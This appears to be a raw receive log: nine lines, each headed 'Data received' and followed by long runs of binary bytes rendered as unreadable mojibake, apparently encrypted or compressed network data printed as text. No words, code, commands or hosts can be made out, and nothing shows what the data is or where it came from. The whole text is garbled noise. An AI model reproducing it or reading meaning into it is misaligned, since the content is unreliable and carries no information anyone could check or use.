Data received  (ŒîEç@] –u·íĥ‘ÏCÛ8táÝ`?­*sCF¸™ÚM\àÍù7M¼ž-ÐÅ&âӝOž¯t "Î#ó¢¡CL*( ípú®úKÆ-Ú­Ó߅»Šíë²D £3Ò±#`É©w@6õ$Ô/nމ Q•«ï¼°¿žg±ÂUÍÿl­»Ð9ᾺãìȕQ`¡“ªÎ»Ë¾¨ØéýhGC{ÏdÛʅV¯Þ09\R- nŸ‚–…•®£¸ÍU§L´¯× jªã€=—x!³‡š³+.mÚí܃;©’¥˜Š¬½BÖc›u²NU™ûÁ,Ó¹¹²G"L¹ß"¦;a#/§3“&!÷Rü9ۉ÷ÎhsЫ#S/){g rt¶óÝ¿}KDô¿]ªtÜfôÏǹ'=ð<э¾Äçí4Qcþf“ #3GñnL•Ïù1 WÌpÎ'³t…Y¦¨2ãÑù%ôm­RËf4-iÄêƒpsdܚ ÷ž–÷²ÖBõéi!ÑË®ùâp¦n&ÍöÎ÷euN€Œ{ë¥ ¦+g‚ýâ÷Ÿ½ªWyåž÷Èæ_ËþñÀˆÔ>ükJ:Å{ԅtFt: u!ÑÀ̏:BçOۗYY8?bctÌ™ àoFaKò»È••›wŒNÑ_[á~•ðßñÏV‚hcÏ#æºÀªçª:Ùü4t̂âèpv ŽÖ"&ÿò •!$õ<&[?„ÙłÙú¡•™ˆEêÜ"ÔBìë}Ë/Nµžò…,mÓ‚>¼g¼ºC=‘©>鐹8M’5Édð3ƒ& E4Xý¶>ïɎ€n):SäãÓA¿/ù¹gó F4¸¼ÌËÓ½ùY‘ía…mŒ|±©Í4F¡ÕdzQ/†|çn 5ÅBEµybún-YÊ TQ}öP" Ãͱ¿Z ¼}·ïP0Yë»ôµZo˜†fT¥Çœµk–Ú¦S²;—pyÇb*{Fìɭ͌Z;<n‘$š'to 6Ã÷4ít&}æ“ÀçZÍ ]“Ÿº‚òþD×3BÑáwÚђËú2°%¨øäëTÌop¡vuÏÆeÕûÖ멤m¹ðëcïõ¿™ÜZ¢2–ŠÝ ‚'“xûóöX¢q¢„Íå霺¥6û@P ˆ2yç nûg.ŠNËÇ̑ð?`ˆp²¤P29Ü쩵“šÇx»ò’ãƒ?2O>¶¦Óý\‘õQ°êÜ2‚î£ù÷*ªYF<X•8‹¹{ÆÖWásd$dÍsiòŒM -¬úU)¯ÇHä³â[`Wi[º:áßÌåD¶j;#ôÓNe7™M‡b>Qˆôä_ûgd秩¹Z6y·ÌÛË&ȕ C·ŸêÖ Ø˜CÌTs\ •µb…çB Ð}¶Ý+TGMDi ëŠÙÝíMbWšÛ©ÔÇ^Èn)|#!ùòçý€õ»u:dr_²µ²owS´Ÿ4rR"0J¤&XgäÈõX¹å岃EŽe|Ö>Y9sƒ;’ê¹Ù¦àZ£û{]ùšN<ÞåõŠm°\ÂoŽ¸Ô²¯©s‘?‹[~ê8œˆÖˆ,».ôƒÍíðÆËÛނ*›ÿcՙÝõ½!ßüÖ½æÁ³šÜÑqqd>Y ·ïhÄÿ’øÁ‰•@qn«3÷X&Xå|“ϝ•H´ã|› &Dˆòpa·«^ñëh%»,Ý5$3ì6Ñ8 É1Ùù¥ý°ø\àå؇¹Ýß*˔Z7Fq±*¶àƑvWg{ÿ*qãLS›zâùË7óe8ž`Ö
Data received þGAƆ4¬¯…2Œ:¡mJKd.քÏïˆÏ¬9V·ðµNò6WZ,Ô¼ÑY•|¶‚=—‹ÿ¡OšþÛ9Z*:Pë´+¿²üÿ×ÁK ¦ÝA©¤;šWÚßÓõÔ4Q] GÀmêD$˜aƒ6]®¤c¨gÞA9§DŒöÍü¦ô{þ¬¶Î›ô• Ñ1&ù¯Õ¶íØ쇢¶õ©ô'ö0J‹ÍpnEœYÜ’?$£-2¢15êòQAú4ˆ¨¤ YÊîÎ`ÀÓÜζ¨ˆb@ç^j›hú,»q1(=9š´ dE>®P01C¤x²j›ûB‰@K:®·JŠZ¤( ‘åÁíô~B3g®×è뀱D¹Î½ ÃgÄG#!åEÎø¨½ëí0yrér3H}wÊÅWç~¯–Û”'œ?aá¾ä+ç炮>Ò¡?þxÀuyÚÚ¬ñ\3…ä ­'¥Q¢ÔjÞ÷:ÂçKäÙ_’ª ´œø+—7ÌIþ&á3½×†QHš…ûµ#O؝Žþ%áì§sv|ñèFÅü¾aƒc¤bŸ Ž›µlÿ&#݀P2‹ùŸ¥Xè!@¨'UÆxí ¥˜ *œâWÂóá .j6ÐËp3-ƒÀèӈŽ¼kRœÑØgî<líqnS35‰­Q)Ug©éÊÇ!HCâ'ÞÞ6×òX =Ց٤ì_¾dAB¸5\j{ÍxÆ(E¥â—b(Ъ'k˜ÁÐãe>\¤WÙñÆâLÝÅ)ëàåŒOìâÉN‰è ¥÷ñ›œë`Hû„‚Ý{™2}f¥•Â¡LC¸qËܧëòkew1¿(®ÓÞ´þ<…­hµŠÙTÕ0Üb‰l0RÀ¼¥bm8Œ·“ðÂÚ«ý#LçRÎÙ¶‘µ™1~‚ç<ºž ê_Å5BÓª9kˆ¢0µ3$|Y$¢©p¸–tÏnÇ^ &"Îu\:ÍöüÞèOW ÑöXÿ¿<qäì{u›ü°k\)¥çøãaf5tWk“À¶&ò)!­fžqtÊöÏZ Y(ïºÿ\ўiÿ•19ž%6±e?:Õps®Û,d;¶ ô+¶ òQº²B‡‡º 2Pþ»€ù×¼¹·øû³WËô¹Í.G{¡jÁF ˆ…Ö3K,áÖñ·†s±+ÿ[¢€>²ÈÖ \?©aºÿz]::‡ p¹4Ó{ӌ° ø™g^U±ÌŽ‘NÄ 9¢Bzå¿ùûØfݞ߃ìâ˜>(éæèdøt1·‹RÃÿIXÁ£·‹c@YÍØ4¦¬{ٓ|PÜ9±T‘¥$ÆúB˜öµÝœr7maR‡˜ Di¬róù®ÿ¤uœ÷ã«æ¬VkýfÕ ñcÖô¦Pž*7¤6ªØÃuˑˆD{Nùs¢$ÅLñד«R’âpMcôŸw<¦˜å{²½Ê^ _oÿ¬ò8Ó£=˜¹¢ ÐnXÇ×ñsêö¿Âœ=ÛmáÃåX]Å©Ÿ‹è@ÎÝÁIN.±­n|ñ«–Ã^éSf»L©ëiAÉu‚é¬_q¾âæÈr:r¿:(ÂyH£ÜÚ%VK 1Ày$É-ÏÊv´mÚF«Ù„~Ô À]h*ƒ£Í%{’25Y–ú<¿:Ï‘îŠ šÁ*1橒¡"F.U˜+œ€ÄD)iוü‹ ݎ’¢’ÀÌa±™¸·€Ë¼„(àQß] Ïñ°¿mâ®l^ ðk™tã5˜4Jš6¿U-†«&.ßÛ¬`nRø‡÷G¬U{bÅ:{€~ ?&ð
Data received Üî‡=?œ;^Ñ=`ªEÎf0%:ç©6š¶˜c‚g„ÑÕy@ºõ”®W‹^¡Ý§ãýpóõ!žº£8”Q ©í5öôô§»ÈÒUÉõöP–æÉ6P8“ƒ¤Šÿ‹ ú`:6|&ÎY8ÒÁà–ì¹}+å™/p’Çs“+Ֆö¥°.ª]–OïÎ]wz§JÛ“F¢¼³o¼Ó2¾YßáÒµÖþßô¥Çા¦ÌºÊ»7‡À:ÒÑwU„õ%çþi°)Kê3ªmð”B̑¦ P‘‘ÁÐ폔èùí©Žzýè/ëŗ¥({õ›¸½/‹ÀpàYqÀþÈ {Ëgâ}ÀÌ)X†€\û'$>¯ò.»7ËË)BdLqc¸®òt:žKù\öJñÞâÃç³u1>üò ¡Ä’N21Y-9ù]àVÏaóåÚgؔ¯Œ‹“y/1F«®¡ª ¸Ê âÌzýT©)ÅW†ZP¨¢sËÓ¢æ¾!#¾§ÎC-¿MUÓß¿*…%ÃÃh-¤Å|&n÷Å;§\áOÃõ>&Ãâó6;í©H¬TfÖ$k¶šª‹23·üæn¸ÕN¦çx?c‚ cÍÌÏõÝqw{ҙò½%ÈKx’pBÌFúÖt»y¥YЬæeTWVæPú~¸îV%Þ◄swȁ¹Žaþ­m™OÞðÌ˹kfŒÕÂ×ûIEC¿>Ýª%Ò]‰¬Íö 灑P¶J îPžCÐ ÐHóҘKn®Úó;È¥Ÿ¨ÀóïVõ ½´»Á­It")ÁÛ2¥«U½)Ñú…§Qˆä'dÈöÀ”Ã(ŠÏŸ­w?œœ®V£}+}Þ`—~¥Œ>2u–ÊJ/RhÂó¡DOP¿Ú^êÌLë ó>½¬;ãtä=íx"ÄR¹ÕYتÀ©S¡ß[¾ªSüšÖ§HqÚJ{ٜ4¨#5="8=-Õ§áû¯Š žhõ‰þƨڦäYD· (ÇÞbõ€$B“סz)îÇYn…šü¥´Ç1*ÿµ5òTùÜ–!”‡°9„ï *j&„üÛ6FÇþYwÈQö#r%ò÷褽‚ì’Åa£$Ÿ÷mJÚá£^Í#ôëB'f†<+O™Å‚ƈQš¤Ñ»ÐpeòÖDï ,Ï7ï[Ëǵb4)÷þ´²ñòŒNìÔµ};Ÿæ\¸·! W[¯ÕŸrÃYãW\·â°†P’àÇÓ¤è*´si¬4÷U%§ÞJŒRdo8\Ž6\øç@xîE›¼«NôÞPSÆ«c¤ ÛÚS2[ŒÉjNU§"’ ¡uìE¨ Ôåù7E'Ìþç  bH8¥Î6¨[>³6É6Þo!ÕW'hÊÓ]SŒ^àîHMk#¨Ç۔-ÉÁ¼%ЏçᢓÇ%j"ó÷¤À'¸#+Ä+Uº6§jž:~¹àҗrÚÕ±V¬â•¤yóį8äT8®¯×;0?Ca/×ê Ð<ƒ„Ú. >y†¨U®æ¼7ðZéyÙg±ÞÏBhëÒsG|ÆÒUlC£ø&ÞJ>érúN8ý=©Õ¿QÏZhŽ@éóPqÁ[;FÚ G»(xH²^€wêÙÕ㦢EúlÍ0O‚Ú,,5Ýx9|LUéÐlÔO¹•ª·ëEtœÉ$Åìè 9b³W/PéšKh-t#ÌېߠòƒÄÔIþ¢ã4гvAÄÁ⍠´á[ôÊÁm³7z†}­¾ÖÕµX¨;\헗QVõ6“hîs<À¢†­3¬¼c
Data received ùs/·¯Õõê+€‡ÎiQu»Ž²¯ˆþ/+[¯Xc=’WYf÷¢smŸk‡&pa+» FŽã\¨R …O™ýs†–!¦à[ x®tÞU ©·¼²£N’mOUª[ø\®_ڍ4~›;b/G~~ø\×Öãn{##­0aÜijŽá¹zÕðƒ¸p³Š7OÌ ßï8˜âŸW¸±ÁtMbt+ü`$A³¯Å[ù:Jw "ànoà¬eÇ𣔱°¯WKk¤CÇÝA¼ZefH¨Ùaä0ÀÖéi1ÓÙ찏¸§ ])½™©bÏîåWsêUßñ0´£a"zfYxþ‹OG‹þÓ=æ´é‹|V˜a«ë• ÔÄÂY˜9uٞì®ÖÀw€¼>ïðOÍÃIn(m½æ±ðŸ‡W“ÐÊA.- Ì¿ò4 >‘'ý Äë‰P¾±±S¥H‚уö)U§Ç¿‡|€W•,äDáÁÑäL8‘oÓâj;cúj ©ö¤æŒ‚ߤÖú¢jÎô7ÿ’ÉDZbHw5h¢Ë#9YfK<6ËJ â£JDÜwL²5õ®J=TCæÍ´>9[©\ yçU7”­Epƒ.0ß˕™ý6àQì¢P= ø:Á‘J¨ƒÐÉ8â:QC· ëæô¾¾|i½VóœøY/Èqõ¼8Ëe_£HÛj ®>u¦×3@G†w´à²‡]†üñ"§¬‘Ʈ荊ˆ=Й}±›þJã‘R«†<ÝÌì>…:Í tÅ?‰ºà%Ãj{Öí¢~3°õ‹xï«å¬KÀp´\à$—p -à6§öµiÁM‚ ‰E'_§u‰ø²òhŠhcÉòÈøߙÆKõ#Éø×ÁÒ²ðc1"åY÷ö œ :nÐ? ö…^OƓõHévxóÅn.Á‡Ø_¥Í_¦ÐòwÜ,Ì¿N¹#s ޝ!0áÌØG(F{T:¨R œ\QCìC7Cñ¤¬}ãˆg©çÎzµ;aGÃÊ/œC‚åXëàM™¤ŸY *&TpÝùjRs¦™Á±¤ž”é)™™o(œ¤¢Z·êS•>ôdõ_/¦åxF9ãԄ»,Íϲl¡×#w òPé›yÜíž›C+o+âC8 ‰ˆYa¹úYP#H]ꦂ郶R¼ÇìcùžÆؖÛJœYÎǗ0ÕÊþh+ÖU®ñúùW"fÈéÕ=E5ÄÅ¢ Â '1sÎ"ªl¢îôΔ!óL\Àæ⛝hï²+8¼8Ü;)^Êùâûz{Iyâ®ü÷»º\ŠB ¤ž1 ‚uÕ·ÒÅÅWÆ׸wTU¼–œ­~“ŠF;ny¹_ò=,M…a7k³×7ê?b-P ,ćw#™Ê'Šõ¶#RÚ”¨sôýoÖ<ÏÛ±ë{í‘fÑßi“åd%_àDýʱ<|–N“µ52tÐ_ xƼè8½éÒ=’ ”Jœq¹Xô7Á€IÃ1-­]𹇾–;¤¹ Á"ûTÛqÇ_ e¤5ؓÞ&¡åfNþls@¥D<üÞ?M_k¶SɳëKd 7{ƒV”ß„xgé½ÖI>ìÉ8ߝNOÛ¸qnÆúo9Sü˛Î5ac‹ <m»â¨‹¢êSmÌP)݌bxö.½ßµÇÅè¯ûãBC+~ÆB]l5¥ x葭qá©U9öØ͇àU)¡°À•ÙÜDlá§ðòõw¨…¦íËÓËR&ð8}íéä¢ ÑÛâLNbL5ê€Ón{î Áÿdû¯Œb·ùmÙÅ}ì
Data received sz(é*Ïå@6:èeê鯏eNêAbölž£s 4kR)äƒL3\͌‡±GÊÌÕ6ã.0‡Ý›ç¤a_É ]ø© —#(¡DÁˆÛb<‰Ù•¢·Y}>çÖ8%YAHÜ® Ñ÷§îØ;_Ic§"ùÑI}þÉ¢O߂£TmÞWûa-Mà"ÀÊBþzŠ‘Û:êÕΓ{#Hr\—=C;Ñ®f¬"¡æbŽÄÁ)[·±Ïäyxÿwòþ{ü÷7„ÍPƒPà† ñÓ‹ ÿøX\‘`Šë«’ÿe¾Œ³tþúgZ·#@ðãòÏB­âqo¹›Ùî^šV —‡ôúCþÖ.ÚÙÄÂHýR/ð>}íÿð¡omz¤w5[cw êôÖºôöÅéµ (´&Dš"x¹oj{O¥ šþã¤àöUõ:Šÿô×M.:ß<'Ï?[§Ñ‘C¬*yÛ4ø–³óۣѲwtIÖË¿†1vV@¼ÝAhs¾b\»TÁð›¹ä41_áö6KyRö²’#\n5µÓf…†¹ÚÐ^kÐoè­p/2k¬3)§*‰¤I×rŒŒîX‘Ä-Å œ%¤ßiFáÖaœ£-??ã3œ!9 75 ºåEà_è6â[8Ðù‰p”a4Ås R¸ÑpɎ™eϗí|ú‚I÷€oåY{ 5&©(güßò@ìÍÔ§^ºg/j]LÆýåvsjj)„×E7Ž¥.Ž1àîX‹°çJw©hÝ_wGs³‚'3éÑòCJ׉›k¸&ϼ£9jXB &¨xþŸq¦3n7$é\É,¡-hz\4Zž¤ßKÊoa}œÏ¡ÉHDçä ð‹e쏜O3ŸYÖö’Åèƒ=ødÀëò¿ ºýü¨JƒhÎ8ܔ½·!Y„$CÎ×`5kôyCT3ÇÖy5ß1‹G°O‹ƒtn>â{ñQvÏU'éE†"§øä°šíAb½þRVÎr·Àižî ,Å=r©¼l핯•!ü“ü3©£’q|CI"µ‹Gìúô•ä*^úPÖßAî`–‚?ýCøÈÀ²<ÍìÏøY½/¬·àÎR¯¢¡–ç5x 7=ü!<੒‡»,-N y«ˆsÇ\R읓¸²k#ÛÔs£ü¥W´ß2D5æÃR‘µg¾2ïJµ]Þm¦¨ÔCM5  ;<Å «1²f{äh û´±ÿ·l\ėþ=ÁÑ뷁¦âÀþ±‘r˚‡ #Ž£5‡+‚ŠÚBcÕ³"Æ Á)m¿¾ „Ÿª°f×é0 ÏSœþ¿CcZ;vÆ[™þ×ûr@} !dgõnãðBŸÔŠÏ$ó`ͪٞaчނËÁˆÒöôaÇ0= qjN#-&äû(Òà½u¿ tÎu¤ùõ!ñ#ªTôq9d‰§ïQotwäÏû˸B||Z»”9§¥p‘p›r$7QÎU6i×-H§¦ëÑ,Ž*ÐþãYåœÎuß_J¼ù¸aÒuŸÜ¢R½y¼ š¶¡OTӈD Ýˏ" ÔÈ^Û5íÏ@ k4‚n?…彨6N5w^–4wz·?¥s¤yëè0nž2с²q Û°{FüÎÊ3WsÂÿn T¨ L{¾§® ˆ‘Ž×UGŠ£hãÙY¢}¬èV—ß8n/ 1âÁ;øssxåþ$ܶ ŸÀ‹G‹«Ë*“þ‹$[Î0ð÷»¡ùÂ`ªh0¬"|¡C´c) ÃØ9Ñoݼéó¡-{qi·§OÎ#ÝfD…q.”OTMplÙ1i’L®ºZÅțZ7ýȎ¿Ù
Data received q.ù¬¾ÑŠ-vñ“¥Jh¸ û<ýe¸2è ¦òÓû§ôô¯Ž”)¹Í:Mû¤bPv>Z’Ìx®ì‰ Öô ˜ É}Æö„Ƕ2sÌGf$hH™NÊüƒ”yŸ‚ÃDÖ|aG?/Ý]v7l ÊÑúpÜ« Ûï¡$ Ýu³},FRmfæ"÷ƒ`}©u+eí Á¶×¦”¿lä߃¡”ÉW·2&xRþ¥ 4Ÿ,Hg=֋nø¬!ü§ŸL Ï>Uþäc£¸ÕJ/fë1$텡D˜vji—ÍÜè€Xc?OšÀ¡ƒ”‹î½;Ûê¾ýC †vÔCð²ûajÖÞ$v!X•]AÕ­ùRóä„%E@Ðá[Ѻi½¸ªXvhY\ߟ"O‡ÐÞ| «§ƒü%yoÖm‚ é‡ç*sL<b¡@'Gå³í’ݢMTâ‡{ºl¬SΝEm)/‚õ‰ØÃ6¯ç…> %…r  ¼dXCc&żM÷^M¨ž¢­úÏbuc×Äc¼ÐtKI“œì¾åßåÝ1ÎtkiJ«Z_ÅϋWSTC؍ðè "*º·ïì+wé#?9Ó5@’Ó†¶0oG€Q·AS·¬Ë¼´'\O,kõ–únKûr*Kƒ†½¬±&ß2ïV‡¶@HÛ6˜~nßoîHí"œÇÃk#]MõíG‹vö߉ÏßÈEØ{\ ²è·œC¹a†0õ:7†`ÈMÛ=Ôç>>B_É.¾RäÈËI¦Ü[us‚7Yhÿ§Þ· ŽýR÷¡í×)Rªl|¸V7tÀzãføYˆñS0›»…hÁœýµC%gh/¤†H z¾~[º±l]ò¸å•€â%p«ÄÉQ -©W9¨Y£‚êâzAÂ(æóôövwIù¹_¿žÃi)ÃyMGKµ”„8Åw¶µìÁŠ)¥Úrxƒûa« 9,ëJ˜¿{·ërr–Ä6|bÊzDۂß_(•-)ƒ[!āóH„䘫ÖøÇ8´Ü̟r˜á3òÃëšö ?c|¾‚ê Z_Ó<|¦bêú㇮~ñþ§ã, þ>jòÀˆÅ¿^ª¨Iq«±Ø+2úµª¯˜V=œaõÁ‡£ì¦Ùžµj ŠíÃWRo”Yò¡Ús§¥—Ÿ¸o±â£p#Ý1.YWáôl¡† Ÿ`fÛ8?5;B«Ä„ÏäOÊ#R­sJϹ0üJ^$aŒÓAšE pésڝz{”H™c•È¦M;Å*Ž;q”–«ð$zÕcÊ¡T­Ê·=QœÝ¢-&\(ÎP_îh>ûø\²Hgßhff™Ð-N4Þ¤RÞYZ}ŏ×q¥ ‰ˆ"V£À£ÝK6àu¸†¤¨GÛñ!ö8®yh¢Ó;r‰(Lî=Õ5˜¡BÕ“Ë ©Ö”aC×"…ƒ¡ý ÂO<DÏBiž¯C¢ q°àA–Hí;ÌY©ì1Œå䋐Ã'uNÀ3sx%fŽÌèá¤ðF2CIu/[àÀ0¹àœ„Lôd)Ü%ÜmµÚñ3e‡uCaT\mñ]1é*}‚YŽ=ôø,ÚL£hº/#ÏՋÐôu{ATt†Žcjf;Óò|¶RäDmX˜»k§_Ü=å`n²¤á6lÀ¥~”JÉAñàá‹H_œ[aS¼µï14H›rÓú ‡s+„EÈÉjŸí´ D_¿Á©&%+P‰9JÈ8G G|×ZÞ%»¡~¤»5 \§öâ°ûqzC¸ZX³K+´ùêsâU[ ±þ,
Data received ‡¸»œ¯„¸ž¡g:tØY4ÌÎC;)Ç13áïŠÚ)ɱ`•ãwÿ¡AÀÑ¡1OuÁ²úI º£Àþ¯þ„œúƄß*ÛóÜ 7í|޲ށ?­F)UR€ˆJID>`‚¾úû6.Ÿõ^?Uz»ˆò n€š§Ï™£'¨vqïK×|°0—N:–‚õd¤"N/ôíôålá îlóÎ9+/!«kŒ$Ž]¶4¥nDTR¯‚h’Ù@’$N6i„¢Ä@ˆõ³Î °®22zwµûÀ ŠWmð݅#ü°˜11u¹‘Ó“c[Þõçš+YhiXR(ËmƎŒ´PwÏ 7@·(aŠb@}zæîsΝ‹=+ÂNõÔ81¿ÍåOŒŸ•Eþòچ«ék 5FGfŒ¸Eªm˜ ýå֎;U¨$0J³-"8R&1ùøýäZ;Á˜–•§ /V=®Ëð¸?â’9„„dÐÕ ü΋ÍÙU’÷G¯¾ñº¤Ø5“’±AÏ¢qӝ›¨ê¼?â£&C ãf¾èe²w¨qKݝÜH«”䣖¾¬h´k ¦¯$«Þˆˆ~‘oQ¨/ëÁ¯Ú¥¢Æv[ßo4šÿÄI ¨AÔۊÔ<è)qšN$h—CØãîti dk'ÀlHåw«¹‘‘™lœ(™Fçl7L&¯(’wªÒ³PPà%‰›”áúÈUÅ 2É!>³Ús,µYeԙ%ËäÚ¬›^×6tÿ¥¿ªƒ[ÜÈ&ºá.Æ®Q‚¸\íL2óÍÞⱏ*ž§)b#aÁ Aì"Ï\Þ¢”Fßc”Îœ•ööø@;ç¹Du­›7ƒ ?ã PŸŽöãÅ¥\I$× ÈÎxR»™Ú‹ æHËûˆ˜Çº{§ 2´ÔˆÖ9Þ~É·oğ!ÿ³³¯áV4ÀmÛ,6üÖƎVÄ:§x›ùïù !7¾@”;`M@óÿЉÝ#=ÏþeEMVÃõÔ«ôcÔGó0šT¶,É´#‚@3õSæ#ŒèΧ.HØ1|Õ¯ÒtÈ~«€žx6d÷Dnš‘$Äú¬7}Qwþ|g¬ÎA–¼òœ¡¤÷„¬ß¤ Z6_/4Håå÷êeC¾i„¤ÀžÑô‘}ª’M¸ôG`íu§ŽÃAº £·"—ÑÒ¢O’´ù·”å=…·O¦w<(MíˆW¥…æ"׬f<~䃝i˜ 1%'uËÖxvÚç–'À[ÅÕêÙFâ˜xDG'IãtÑÙòÅXÓZ&n Î-TOÎÀÁŒÄä=ãyð¾ 82µäi^ ssfx³‡Š­Ü‚Ç:?Rb5,¼®'¤K/ºm\˜*‡R\܅.J®Œ‹µ!míĬ«ù`†ÉÜDÜ : ^DÔºBãIKè‹(¥ñê¼I,H7Çê¬Tñ'ÂÏ.TûV^Õp±uB¹Û…*˪ôNn™ŸzáãIžz‚"!¶ë©}^òÅ&¡×1@_3tτ+¡§EÞÍ9ãºò­?té#A±}âüM==Ö¾O™{)îEœ:.A}nb N+¢¹âÓ¨ xš=®ä¶Þ …˜#ôU_©LÐ"K®Þš,5O@r!Tãÿñ73vÏÁ†?>PÁ ß\K%ìsà#Ѓóì(DAÔ/tÞ½¾Ê–Â}BȨ}pÃÐܺgtn™*V£Ûýùä:¦*¾ø“qó³e¹jQ‡¬Y?Ú{¬éÆÈZË}Žº¯´[£Ðcþ‚¸ðÖÉ=Ëc—=ï&œáìKüfåŒÉ¿3¢žc($£mDtO*ñJQ
Data received ŒóVÖA€Š¬Üᦆñ¥äíÊç6 ܂6`Ö¾ £MvI¤]ZØ ¾ob„îÅé'Ãÿu#ì톧pjÚÚsï¥m’·úÞjlÜ7Àü#¯šÂÚXƒ:áI¼ÓòƒAÕ|.2|j+¸‚ý¼Rí ûµjx«ìqÄÒF-Bœ,Ê ˜eÓí%’±‡Ä0éޕÙIÉ}àYfp°Ðœ¤Å­R¶¥J9ø°îó^»•ò‘$µÂßÓwÇlmãƒ0; ²ÃŽûL­g«8^{M¦kÂÓƵå< {—Œi=Š×²Û M5¿„`•ø´î =€v½][-kT×ë<8)g¦šé¾“­° ¹§aÐ͗A—@Ï;B»7<·E“m[m ¡BÄxì?˜Õ¶ýt;Xh8áõáwFåaøM>EW{ e\qӊîmTÔ­´×ôôX%oû…ø#⧠¸Ü\«kLw'§&•d'ãç+B”\`â¡pñóJ ŽÍ^C•òííxä›ôð{‰ÄѐÓK»YgbÆ@Ìä4ÂifÕ ¾pZñá8gš•¨ŸWüÆ0Œ3÷M_KüLvØkÞÚìtA…å|)³±(ç>¨±–†/Nvyà†vÕ*AO߯u~TvÆÕ"Ò\;$±4!“¸­þü›¢ˆâ´¤óó[=þ¡ª96úÁßMM¦èFú[8!›ð×4¥Âo˜{¨“eµA>:˜@¶‡éñ‡%òÁ@ZÑoú›ØE”ƒ=Ƕ5¢4!銍ÖBÜe. g-w[M1¤Û¦`EºGX<$‚sxªv=&̯2QûéÏ,‹û˜ó8ãВ÷1òèÈsƒq¥ÐnÜXÓ Ç.™åß¼Œ¹# * cýýND=Éÿ9ôÚJ•ó ®ê; f£F!kAš²O=ç:BG §ì}6kHxf·ÙF‘`ÝÊ¡/ꆥÉ p7föÇö¨üˆcLk ðª›d%)B1JBL 1i…aî#pÒ{>_Í7·©fõ²Iiā+þ[uR°æëáßz—à*GäÀjCp–¼{WÀðÀ¥k:~†`ñ&XMïíN8ÅÂSkêÚBó.šgS;\êk[@Êíº@  |’ÂØ J—¬þÉé^Ó pÜۃ†*Œ¾0àÿÞ& D}{K. ȱ0_žœ<õ˜«†ýgŠš¡ø,Bý¯½2WHJ†»KÅK•jN{~Åáü^a Ø;Ô¿éAÏwß)½…Èô¢NM¼Öá¨i^5Wýc,a‡I@PÃw˜–Ï®U‰lcA¶.„ÓZW&Zkíoù ́œË2½b°gž6Ò°†_Ž0o헄WÊ.]¯3Æ_»/8\°:”DŒ'y-ÜʞTY|ãÖ-ã5YÙ;,VÈ)!ÇÙC‡á^'CWÏ+Õ=€Ž‹t³™­PZÅ¢}è+9c€y^òÂÔcNm!¿:Þo,6™HØz—’+­øH–fXÿlÿJ¬—P4UMÑ Ó¹{Þ¨e ›óçn%Áƒ~°iVÊƦE¿Xü£œ;¶>¢ÕÚɠݺ Ý"k¥Ç$¶ûxÇ#nŸ E£ÂÒ40Œ ؄ª•H-ÈOYFÛŠMXGcïÖÜÞªtR1×·V_ÈñÙÍþ“£|d<ÿc&[p;ü{¡„Mf)5g÷ $=¿v¨ìv^ÒÈz |_­_™S$Ð\ą§s0š›5Äg&ŸïË 0•X˜=hË»µ`Dî±î+î]'Ú¿&i[ƒ´ýÛn‰ÈÖy'F!´âK
Data received &NGÞÔõ#-6‹JÊäݶ50¦:°~ï¦õ„(vÙ»Ô=TCgÝ滥Ç:õ\D*V-÷µ'k,².HeT4ˆƒh¢MWo§-ÅÛÌ@ÄYšaÄ@ݕˆ”U_¡ÖÒÜ×6 ÖoOxU)#ø¤}®Bcë¥^9=‰ÁÝ)¤âÒéŸÐUžãxT„S= â@m>¬Åü ¡3õ%‚öwøèlqý„‰º”ôUªg“KXW¨¶1ä-zßÇÃò4W½S]MðDÊAq‘|5tƒìýýwE!¥g«:è¢dJºñ¶uÑÄ ëÒ£ÚÀ©?I´,mI)qa]¯ ‹#STo&ù¯aò§{¼WåºhgZ:CNK‚WÑä ’À¹Ã&R˜QíM¥‰®­Ó r?×w¥\ƒ$㡖“á|vêa$W\¾òdq‡«<ž/Ø1"—”ºKØ¥€%‘÷‚Å¿Ä»’A4M¸kô¬Ôf2*Ì!gç5:·Ä?0RØc‘®Êæ”ÛiR”Æ`û§’²bí ¯¨:8YÕ[Úä€t]LÔ]-¾‹Íj;1k “Ë°²F<Cíä¾eXþց·í"R1e|ÙW:ڝå½Ên.ìë)ôÓ }éÝÖoǝž»iVDñbk.ûòž\ç/ÇÔø­ò-ƏØÞ4¡¸IÒaáæuš[®PˆQå[(g ¢k¥ÁR' ®Œß"¥¢Œ ¶Ò…†üs`%“¥÷k¢’Iq©ÿ áG>õÓ)Ï;i]¼}›Žÿ!OzBFVXÏ ^ÁÖPw€é£ Ù{ÙDv©ÍXä.ÌàQpÅõ¨¾óžg²ä¯F‹ ÿ”#—ÚƒI|À[\2lãêh4´GÆ?ªö湌~4lZ žjLÃNC~¢ð ¼€¯~Ýv; >ÿW‚?ògx]ی ÇêRÍæå7­ˆ®ÜûÂÛrph<.RN·‡çˆ®pÛ><©ä†™½îº—³ìÀà<EkÌÿ€Êr”–ЮŽŒÏ.0Õ}@Ia&{qN›N=6>®±¾g=á3ðMÆN]ßE5Ú=¨–êDWÌüZ3c-·0þёYÅûÆn8– 𔠻~ÃÄ@_ŸI„!c»‡¥h¾¶’ÔÀ'to;öºˆi‰Ê~ݱ4™0wº¬±Ö^jÆCŎêŒêôŠMh²d˜âí¨L/²æƌ½«4 ê+Z;PšÔÃYv–v´ƒPê¦gú[NMø WÇ#TÚ¥V³Ÿ?agFíׯ2ü«òÆV™ºÙ©yúÒÝÑÞc´{ºW:ð˜®Ð£øŸÖúŠDùœÒôd[ >ùÔbΘøZfU°o5TV¾=t¡õÃjà¡ð:=–×Å"û¾<øŽ³É}d¸økYøÐä¶øÒÃÂßGEö^;O&wKž4J‚ÿ’–~űîSpOpë­RK¬}êJ|œba€îïÕ¦âɪzDZ×jö¶®ô†›yÞ ZÚujR—{ÃDš¨ÿ|ÒÆ*;O£ 0pš wuÝ3ó“»Üê¼›¯ón¼ÃhðF’6 K& 7~À¿y‘µZ<ñ‘Ò³Ý"CPf{™¢¨\az93[݈±ú\ÚÔJLgœ!A'×yþÏ jbTmßê͘Ú`ž”mPè!¢ÌÍIÑw>ÜãVK¼D®®Ø2®ú¯¹ a%~½«¢NÛÞ;>Ý-RñǪO%Š-)j¢–ÀFיYVÅCHWø;L¨¥Áßßo­º,$-C·Ü˜VQ"- {#8kZΏG€Ã€lá zh©
